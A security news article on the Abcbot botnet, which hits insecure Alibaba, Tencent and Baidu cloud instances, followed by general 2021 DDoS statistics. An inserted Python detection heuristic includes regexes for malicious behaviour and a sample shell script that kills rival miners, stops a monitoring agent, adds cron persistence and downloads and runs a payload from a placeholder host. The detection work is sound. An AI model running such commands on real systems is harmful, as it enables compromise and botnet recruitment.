Malicious shell script targets insecure cloud instances on Tencent, Baidu, and Alibaba cloud, removing competing threat actors and connecting to a botnet.
Last month security researchers noted that the new Abcbot botnet was showing worm-like propagation, infecting Linux systems with the likely goal of launching future distributed denial-of-service (DDoS) attacks.
First spotted in July, the malicious script was later named Abcbot based on its source path ‘abc-hello’ string.
Researchers at Cado Security spotted a novel development: Abcbot now targets insecure cloud instances running on Alibaba Cloud, Tencent, Baidu, and other cloud service providers (CSPs).
According to Matt Muir, a security researcher at Cado Security, the shell script prepares the target host for additional compromise over SSH.
Interestingly, the malware kills off processes from competing threat actors and persists itself before downloading an additional ELF executable used to connect to the Abcbot botnet.
“What’s evident from analysis of this shell script is that the threat actor behind Abcbot is heavily invested in keeping their knowledge of the cloud security threat landscape current,” writes Muir.
The malware contains specific commands to remove crypto mining and cloud-focused malware from the host machine, such as WatchDog and Kinsing.
Research also points to the threat actor targeting monitoring solutions used by Alibaba Cloud and Tencent, indicating that the hackers are going after specific CSPs.
The report shows that Abcbot developers no longer route traffic from additional payloads over Tor, pointing to a new approach to obfuscating suspicious network activity.
The malicious shell script also introduces new ways of communicating with the C2 server controlling the wider Abcbot botnet, and the installation script has changed compared to the one spotted previously.
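As an added example (not from the report or from Cado Security), here is a defender-side heuristic in Python that scans a captured shell script for the behaviours described above: killing competing miners such as WatchDog and Kinsing, stopping a cloud monitoring agent, setting up cron persistence, and a download-and-execute step. The sample script, the agent name and the URL are constructed placeholders, and the regexes are assumptions about how such commands typically look, not Abcbot's actual commands.

```python
import re

# Behaviours the article attributes to the Abcbot installer, expressed as
# per-line regexes. Family names (WatchDog, Kinsing) come from the article;
# the command shapes are assumptions about typical cleanup scripts.
INDICATORS = {
    # A kill command on the same line as a competing malware family name.
    "kills_competing_malware": re.compile(
        r"(?=.*\b(?:pkill|killall|kill)\b)(?=.*\b(?:watchdog|kinsing)\b)", re.I),
    # Stopping/disabling a service whose name suggests a monitoring agent.
    "tampers_with_monitoring_agent": re.compile(
        r"(?=.*\b(?:systemctl\s+(?:stop|disable)|service\s+\S+\s+stop)\b)"
        r"(?=.*(?:agent|monitor))", re.I),
    # Fetching a file and making it executable or piping it into a shell.
    "downloads_and_executes_payload": re.compile(
        r"(?=.*\b(?:curl|wget)\b)(?=.*(?:chmod\s+\+?x|\|\s*(?:ba)?sh\b))", re.I),
    "installs_cron_persistence": re.compile(r"crontab|/etc/cron", re.I),
}

def scan_script(text):
    """Return {indicator_name: [line numbers]} for each behaviour found."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits

def is_suspicious(text, min_behaviours=3):
    """Flag a script when several distinct behaviours co-occur; any one
    alone (e.g. a cron entry) is common in legitimate automation."""
    return len(scan_script(text)) >= min_behaviours

# Constructed sample for testing the heuristic; not a real Abcbot script.
SAMPLE = """#!/bin/sh
pkill -f kinsing
ps aux | grep -i watchdog | awk '{print $2}' | xargs kill -9
systemctl stop cloud-monitor-agent
echo '*/10 * * * * /tmp/.x/update.sh' | crontab -
curl -fsSL http://EXAMPLE-PLACEHOLDER/payload.elf -o /tmp/.x/a && chmod +x /tmp/.x/a && /tmp/.x/a
"""

if __name__ == "__main__":
    for name, lines in scan_script(SAMPLE).items():
        print(f"{name}: lines {lines}")
    print("suspicious:", is_suspicious(SAMPLE))
```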
Muir believes that the recent developments illustrate how the Abcbot campaign is rapidly maturing and may be used for DDoS attacks in the future.
2021 has already brought several major DDoS attacks to the table. Last month, a multi-vector attack peaked just under 2 Tbps, making it one of the largest ever recorded.
The distributed-denial-of-service (DDoS) attack against Yandex that was carried out from August to September clocked in at a humongous 22 million requests per second (RPS).
A DDoS caused internet outages in New Zealand when the country’s third-largest internet service provider was hit. The attack cut off around 15% of the country’s broadband customers from the internet at one point.
Recent reports show that 2021 will be yet another record year for the number of DDoS attacks carried out. Threat actors launched approximately 2.9 million DDoS attacks in the first quarter of 2021, a 31% increase from the same time in 2020.
During DDoS attacks, vast numbers of “bots” attack target computers. Many machines attack a single target at once, which explains the “distributed” part. The bots are infected computers spread across multiple locations; there isn’t a single host. You may be hosting a bot right now and not even know it.
When DDoS attackers direct their bots against a specific target, it has some pretty unpleasant effects. Most importantly, a DDoS attack aims to trigger a “denial of service” response for people using the target system. This takes the target network offline.
If you’ve repeatedly struggled to access a retail website, you may well have encountered a denial of service. And it can take hours or days to recover from.